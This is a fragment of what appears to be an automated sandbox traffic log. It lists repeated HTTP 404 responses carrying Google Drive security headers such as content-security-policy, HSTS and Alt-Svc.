report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VNLhe5+VGhItSpxv0O5UXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UMLgWSycTou3KXiLE+Y9OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ig2eIGJG8u7966Pvq9bhJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-r7/EXK6grFuMUG+yIo6RJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-oChLMzREAqAikt7TzxU6SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-9WGxsSQ5nxzITWmNQOz8JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-yMLbI26+KHNmMSG28FOnGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-S4DWIOzXvNdTiPT3Pn31og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vSwnWHBwHPLSIiYFmHHZaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:40 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-rAOCuEYSNe/jrXMcD3QziA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-iRqu9Dt5DRTUWTGw/qCBQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-S8Im4p2qhErMgPnjNkBv6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-E7q9Oar21v4uI1qY9bHFMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rfaBey0/uohARUjZJCXGRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-/vmt5aDCe2wfgOI7aS9+AA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UZ5qWC0ljpBak5aPHb0k2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-8sgY9maDLSbvtmDNw+qkBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:41 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-XBWkPW2f+YP+4LKBDxPYYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9xGR97D0+xDT3HvwX1GMww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
